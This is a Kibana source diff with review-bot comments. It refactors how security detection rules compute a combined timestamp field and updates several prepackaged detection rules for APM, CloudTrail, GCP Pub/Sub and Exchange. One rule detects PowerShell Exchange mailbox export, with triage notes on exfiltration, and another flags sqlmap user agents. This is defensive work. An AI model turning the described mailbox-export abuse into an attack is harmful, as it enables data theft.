--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/__mocks__/rule_type.ts
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/__mocks__/rule_type.ts
@@ -76,6 +76,7 @@ export const createRuleTypeMocks = (
 scopedClusterClient: elasticsearchServiceMock.createScopedClusterClient(),
 alertFactory: {
 create: jest.fn(() => ({ scheduleActions })),
+ hasReachedAlertLimit: () => false,
 done: jest.fn().mockResolvedValue({}),
 },
 findAlerts: jest.fn(), // TODO: does this stay?
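Review bot: In the rule_type.ts mock hunk `hasReachedAlertLimit: () => false,` is the only member of `alertFactory` that is a plain arrow, while its siblings `create` and `done` on the adjacent lines are both `jest.fn()` mocks. A test that wants to assert the limit was consulted, or flip it to `true` to exercise a limit-reached path, cannot do so with a plain function; `hasReachedAlertLimit: jest.fn(() => false),` keeps the mock uniform and overridable. `createRuleTypeMocks` continues outside the hunk.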
diff --git a/x-pack/plugins/lens/public/assets/annotation_icons/index.tsx b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/constants.ts
similarity index 75%
rename from x-pack/plugins/lens/public/assets/annotation_icons/index.tsx
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/constants.ts
index 9e641d495582f..0cf5cf1a303a5 100644
--- a/x-pack/plugins/lens/public/assets/annotation_icons/index.tsx
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/constants.ts
@@ -5,5 +5,4 @@
 * 2.0.
 */
-export { IconCircle } from './circle';
-export { IconTriangle } from './triangle';
+export const TIMESTAMP_RUNTIME_FIELD = 'kibana.combined_timestamp' as const;
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/create_security_rule_type_wrapper.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/create_security_rule_type_wrapper.ts
index 6487a6ec96bf2..87d3091fe6309 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/create_security_rule_type_wrapper.ts
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/create_security_rule_type_wrapper.ts
@@ -36,6 +36,8 @@ import aadFieldConversion from '../routes/index/signal_aad_mapping.json';
 import { extractReferences, injectReferences } from '../signals/saved_object_references';
 import { withSecuritySpan } from '../../../utils/with_security_span';
 import { getInputIndex, DataViewError } from '../signals/get_input_output_index';
+import { TIMESTAMP_RUNTIME_FIELD } from './constants';
+import { buildTimestampRuntimeMapping } from './utils/build_timestamp_runtime_mapping';
 /* eslint-disable complexity */
 export const createSecurityRuleTypeWrapper: CreateSecurityRuleTypeWrapper =
@@ -137,6 +139,22 @@ export const createSecurityRuleTypeWrapper: CreateSecurityRuleTypeWrapper =
 ? TIMESTAMP
 : undefined;
+ // If we have a timestampOverride, we'll compute a runtime field that emits the override for each document if it exists,
+ // otherwise it emits @timestamp. If we don't have a timestamp override we don't want to pay the cost of using a
+ // runtime field, so we just use @timestamp directly.
+ const { aggregatableTimestampField, timestampRuntimeMappings } =
+ secondaryTimestamp && timestampOverride
+ ? {
+ aggregatableTimestampField: TIMESTAMP_RUNTIME_FIELD,
+ timestampRuntimeMappings: buildTimestampRuntimeMapping({
+ timestampOverride,
+ }),
+ }
+ : {
+ aggregatableTimestampField: primaryTimestamp,
+ timestampRuntimeMappings: undefined,
+ };
+
 /**
 * Data Views Logic
 * Use of data views is supported for all rules other than ML.
@@ -292,7 +310,10 @@ export const createSecurityRuleTypeWrapper: CreateSecurityRuleTypeWrapper =
 completeRule,
 inputIndex,
 exceptionItems,
- runtimeMappings,
+ runtimeMappings: {
+ ...runtimeMappings,
+ ...timestampRuntimeMappings,
+ },
 searchAfterSize,
 tuple,
 bulkCreate,
@@ -304,6 +325,7 @@ export const createSecurityRuleTypeWrapper: CreateSecurityRuleTypeWrapper =
 primaryTimestamp,
 secondaryTimestamp,
 ruleExecutionLogger,
+ aggregatableTimestampField,
 },
 });
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/create_new_terms_alert_type.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/create_new_terms_alert_type.ts
index 36caeeb2a9229..213f22720a9dd 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/create_new_terms_alert_type.ts
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/create_new_terms_alert_type.ts
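Review bot: The comment added above the `aggregatableTimestampField` selection still says the non-override case "emits @timestamp" and "use[s] @timestamp directly", but the branch taken when the condition is false now returns `primaryTimestamp`, not a literal `@timestamp`, and the comment does not say why `secondaryTimestamp` is part of the condition — both are differences from the `params.timestampOverride`-only check this replaces (visible in the removed lines of the new_terms hunk on the next line). Suggest ending the comment with `// runtime field, so we just use the primary timestamp field directly.` and adding `// secondaryTimestamp is only set when fallback to @timestamp is enabled; without it the override already is the primary timestamp and needs no combining.`, if that reading of the `? TIMESTAMP : undefined` context above is right. In the `@@ -292` hunk `...timestampRuntimeMappings` is spread after the rule's own `runtimeMappings`, so a user-supplied runtime field named like `TIMESTAMP_RUNTIME_FIELD` is silently replaced; a one-line comment that this precedence is intentional would help the next reader.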
@@ -28,10 +28,6 @@ import {
 buildRecentTermsAgg,
 buildNewTermsAgg,
 } from './build_new_terms_aggregation';
-import {
- buildTimestampRuntimeMapping,
- TIMESTAMP_RUNTIME_FIELD,
-} from './build_timestamp_runtime_mapping';
 import type { SignalSource } from '../../signals/types';
 import { validateImmutable, validateIndexPatterns } from '../utils';
 import { parseDateString, validateHistoryWindowStart } from './utils';
@@ -127,6 +123,7 @@ export const createNewTermsAlertType = (
 runtimeMappings,
 primaryTimestamp,
 secondaryTimestamp,
+ aggregatableTimestampField,
 },
 services,
 params,
@@ -172,18 +169,6 @@ export const createNewTermsAlertType = (
 searchErrors: [],
 };
- // If we have a timestampOverride, we'll compute a runtime field that emits the override for each document if it exists,
- // otherwise it emits @timestamp. If we don't have a timestamp override we don't want to pay the cost of using a
- // runtime field, so we just use @timestamp directly.
- const { timestampField, timestampRuntimeMappings } = params.timestampOverride
- ? {
- timestampField: TIMESTAMP_RUNTIME_FIELD,
- timestampRuntimeMappings: buildTimestampRuntimeMapping({
- timestampOverride: params.timestampOverride,
- }),
- }
- : { timestampField: '@timestamp', timestampRuntimeMappings: undefined };
-
 // There are 2 conditions that mean we're finished: either there were still too many alerts to create
 // after deduplication and the array of alerts was truncated before being submitted to ES, or there were
 // exactly enough new alerts to hit maxSignals without truncating the array of alerts. We check both because
@@ -246,14 +231,11 @@ export const createNewTermsAlertType = (
 } = await singleSearchAfter({
 aggregations: buildNewTermsAgg({
 newValueWindowStart: tuple.from,
- timestampField,
+ timestampField: aggregatableTimestampField,
 field: params.newTermsFields[0],
 include: includeValues,
 }),
- runtimeMappings: {
- ...runtimeMappings,
- ...timestampRuntimeMappings,
- },
+ runtimeMappings,
 searchAfterSortIds: undefined,
 index: inputIndex,
 // For Phase 2, we expand the time range to aggregate over the history window
@@ -292,14 +274,11 @@ export const createNewTermsAlertType = (
 searchErrors: docFetchSearchErrors,
 } = await singleSearchAfter({
 aggregations: buildDocFetchAgg({
- timestampField,
+ timestampField: aggregatableTimestampField,
 field: params.newTermsFields[0],
 include: actualNewTerms,
 }),
- runtimeMappings: {
- ...runtimeMappings,
- ...timestampRuntimeMappings,
- },
+ runtimeMappings,
 searchAfterSortIds: undefined,
 index: inputIndex,
 // For phase 3, we go back to aggregating only over the rule interval - excluding the history window
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/threshold/create_threshold_alert_type.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/threshold/create_threshold_alert_type.ts
index 5c8426e194f0d..cacc2f91a925f 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/threshold/create_threshold_alert_type.ts
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/threshold/create_threshold_alert_type.ts
@@ -76,6 +76,7 @@ export const createThresholdAlertType = (
 primaryTimestamp,
 secondaryTimestamp,
 ruleExecutionLogger,
+ aggregatableTimestampField,
 },
 services,
 startedAt,
@@ -98,6 +99,7 @@ export const createThresholdAlertType = (
 runtimeMappings,
 primaryTimestamp,
 secondaryTimestamp,
+ aggregatableTimestampField,
 });
 return result;
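Review bot: After this change the two `runtimeMappings,` lines in the new_terms hunks pass the mappings through unmodified, and the phase 2 and phase 3 searches only work when the caller has already merged the combined-timestamp runtime field into them whenever `aggregatableTimestampField` names it; that coupling to the rule type wrapper is no longer visible anywhere in this file. A comment on the first occurrence, `// runtimeMappings already contains the combined timestamp runtime field when aggregatableTimestampField refers to it (merged by the rule type wrapper)`, would record it. `createNewTermsAlertType` continues outside both hunks.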
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/types.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/types.ts
index d2ed6965a547a..6b83b1f06a7d3 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/types.ts
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/types.ts
@@ -71,6 +71,7 @@ export interface RunOpts {
 mergeStrategy: ConfigType['alertMergeStrategy'];
 primaryTimestamp: string;
 secondaryTimestamp?: string;
+ aggregatableTimestampField: string;
 }
 export type SecurityAlertType<
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/__snapshots__/build_timestamp_runtime_mapping.test.ts.snap b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/__snapshots__/build_timestamp_runtime_mapping.test.ts.snap
similarity index 100%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/__snapshots__/build_timestamp_runtime_mapping.test.ts.snap
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/__snapshots__/build_timestamp_runtime_mapping.test.ts.snap
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/build_timestamp_runtime_mapping.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/build_timestamp_runtime_mapping.test.ts
similarity index 100%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/build_timestamp_runtime_mapping.test.ts
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/build_timestamp_runtime_mapping.test.ts
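Review bot: `aggregatableTimestampField: string;` is added to `RunOpts` without a doc comment, and the neighbouring `primaryTimestamp`/`secondaryTimestamp` fields already leave the relationship between the three implicit even though this one is derived from them elsewhere in the diff. A TSDoc line such as `/** Field to sort/aggregate on: the combined-timestamp runtime field when a timestamp override with @timestamp fallback applies, otherwise the primary timestamp field. */` states the contract where implementers look for it; adjust the wording if the wrapper's selection logic reads differently.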
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/build_timestamp_runtime_mapping.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/build_timestamp_runtime_mapping.ts
similarity index 92%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/build_timestamp_runtime_mapping.ts
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/build_timestamp_runtime_mapping.ts
index 9c33aaab48e7f..3a45402b467fc 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/build_timestamp_runtime_mapping.ts
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/build_timestamp_runtime_mapping.ts
@@ -6,8 +6,7 @@
 */
 import type * as estypes from '@elastic/elasticsearch/lib/api/types';
-
-export const TIMESTAMP_RUNTIME_FIELD = 'kibana.combined_timestamp' as const;
+import { TIMESTAMP_RUNTIME_FIELD } from '../constants';
 export const buildTimestampRuntimeMapping = ({
 timestampOverride,
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/index.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/index.ts
index 2bded307e1753..5d2dcd4a4b3d2 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/index.ts
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/index.ts
@@ -26,3 +26,4 @@ export const createResultObject = (state: TState)
 export * from './get_list_client';
 export * from './validate_mutated_params';
+export * from './build_timestamp_runtime_mapping';
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_403_response_to_a_post.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_403_response_to_a_post.json
index 3a87caa3cbc6e..fe996c9a52ae5 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_403_response_to_a_post.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_403_response_to_a_post.json
@@ -17,6 +17,18 @@
 "references": [
 "https://en.wikipedia.org/wiki/HTTP_403"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "http.request.method",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "http.response.status_code",
+ "type": "long"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "a87a4e42-1d82-44bd-b0bf-d9b7f91fb89e",
 "severity": "medium",
@@ -26,5 +38,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 8
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_405_response_method_not_allowed.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_405_response_method_not_allowed.json
index e5cbb4ea5f632..3ec10342abae7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_405_response_method_not_allowed.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_405_response_method_not_allowed.json
@@ -17,6 +17,13 @@
 "references": [
 "https://en.wikipedia.org/wiki/HTTP_405"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "http.response.status_code",
+ "type": "long"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "75ee75d8-c180-481c-ba88-ee50129a6aef",
 "severity": "medium",
@@ -26,5 +33,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 8
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_null_user_agent.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_null_user_agent.json
index 434462fb4b7ef..acefc9042bb06 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_null_user_agent.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_null_user_agent.json
@@ -35,6 +35,13 @@
 "references": [
 "https://en.wikipedia.org/wiki/User_agent"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "url.path",
+ "type": "wildcard"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "43303fd4-4839-4e48-b2b2-803ab060758d",
 "severity": "medium",
@@ -44,5 +51,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 7
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_sqlmap_user_agent.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_sqlmap_user_agent.json
index f85d7420ac48f..00bf495bc7ce7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_sqlmap_user_agent.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_sqlmap_user_agent.json
@@ -17,6 +17,13 @@
 "references": [
 "http://sqlmap.org/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "user_agent.original",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "d49cc73f-7a16-4def-89ce-9fc7127d7820",
 "severity": "medium",
@@ -26,5 +33,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 7
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/application_added_to_google_workspace_domain.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/application_added_to_google_workspace_domain.json
deleted file mode 100644
index a8a4fc9deef35..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/application_added_to_google_workspace_domain.json
+++ /dev/null
@@ -1,37 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects when a Google marketplace application is added to the Google Workspace domain. An adversary may add a malicious application to an organization\u2019s Google Workspace domain in order to maintain a presence in their target\u2019s organization and steal data.", - "false_positives": [ - "Applications can be added to a Google Workspace domain by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-130m", - "index": [ - "filebeat-*", - "logs-google_workspace*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "Application Added to Google Workspace Domain", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", - "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ADD_APPLICATION\n", - "references": [ - "https://support.google.com/a/answer/6328701?hl=en#" - ], - "risk_score": 47, - "rule_id": "785a404b-75aa-4ffd-8be5-3334a5a544dd", - "severity": "medium", - "tags": [ - "Elastic", - "Cloud", - "Google Workspace", - "Continuous Monitoring", - "SecOps", - "Configuration Audit" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 12 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_cloudtrail_logging_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_cloudtrail_logging_created.json index 41b9c053ca41a..97d300e35eea9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_cloudtrail_logging_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_cloudtrail_logging_created.json 
@@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudTrail Log Created", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:CreateTrail and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_CreateTrail.html", "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/create-trail.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "594e0cbf-86cc-45aa-9ff7-ff27db27d3ed", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -51,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_email_powershell_exchange_mailbox.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_email_powershell_exchange_mailbox.json index 7f46d666415f5..9fc934d5b3388 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_email_powershell_exchange_mailbox.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_email_powershell_exchange_mailbox.json 
@@ -15,14 +15,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Exporting Exchange Mailbox via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Exporting Exchange Mailbox via PowerShell\n\nThe `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive\nto a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange.\n\nAttackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive\nand strategic data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the export operation:\n - Identify the user account that performed the action and whether it should perform this kind of action.\n - Contact the account owner and confirm whether they are aware of this activity.\n - Check if this operation is done under change management and approved according to the organization's policy.\n - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests.\n - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that\n assigned the \"Mailbox Import Export\" privilege for abnormal activity.\n- Investigate if there is a significant quantity of export requests in the alert timeframe. 
This operation is done on\na per-mailbox basis and can be part of a mass export.\n- If the operation was completed successfully:\n - Check if the file is on the path specified in the command.\n - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity\nand it is done with proper approval.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Review the privileges of users with the \"Mailbox Import Export\" privilege to ensure that the least privilege principle\nis being followed.\n- Run a full scan using the antimalware tool in place. 
This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Exporting Exchange Mailbox via PowerShell\n\nThe `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive\nto a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange.\n\nAttackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive\nand strategic data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the export operation:\n - Identify the user account that performed the action and whether it should perform this kind of action.\n - Contact the account owner and confirm whether they are aware of this activity.\n - Check if this operation was approved and performed according to the organization's change management policy.\n - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests.\n - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that\n assigned the \"Mailbox Import Export\" privilege for abnormal activity.\n- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on\na per-mailbox basis and can be part of a mass export.\n- If the operation was completed successfully:\n - Check if the file is on the path specified in the command.\n - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity\nand it is done with proper approval.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Review the privileges of users with the \"Mailbox Import Export\" privilege to ensure that the least privilege principle\nis being followed.\n- Run a full scan using the antimalware tool in place. 
This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name: (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and process.args : \"New-MailboxExportRequest*\"\n", "references": [ "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", "https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_subscription_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_subscription_creation.json index cfa1ed57a34e7..bda37ae9ecb29 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_subscription_creation.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_subscription_creation.json
@@ -13,13 +13,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Pub/Sub Subscription Creation",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.pubsub.v*.Subscriber.CreateSubscription and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:google.pubsub.v*.Subscriber.CreateSubscription and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/pubsub/docs/overview"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "d62b64a8-a7c9-43e5-aee3-15a725a794e7",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -48,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_topic_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_topic_creation.json
index 43f69c10740a5..a2d97b207f6c0 100644
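Review bot: The `query` line drops `googlecloud.audit` from the dataset filter and keeps only `gcp.audit`, so any events still indexed under the older dataset name stop matching this rule; the topic-creation rule on the next line narrows its query the same way. If the legacy dataset is considered retired that is a deliberate coverage decision, but nothing in the rule records it — the old `note` text is moved to `setup` unchanged and `note` is emptied — and the version jumping from 6 to 8 suggests an intermediate revision is not in this diff. A sentence in `setup` stating that only the `gcp.audit` dataset from the integration pinned in `related_integrations` (1.10.0) is matched would make the change visible to anyone who still has the older dataset in their indices.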
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_topic_creation.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_topic_creation.json
@@ -13,13 +13,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Pub/Sub Topic Creation",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.pubsub.v*.Publisher.CreateTopic and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.CreateTopic and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/pubsub/docs/admin"
 ],
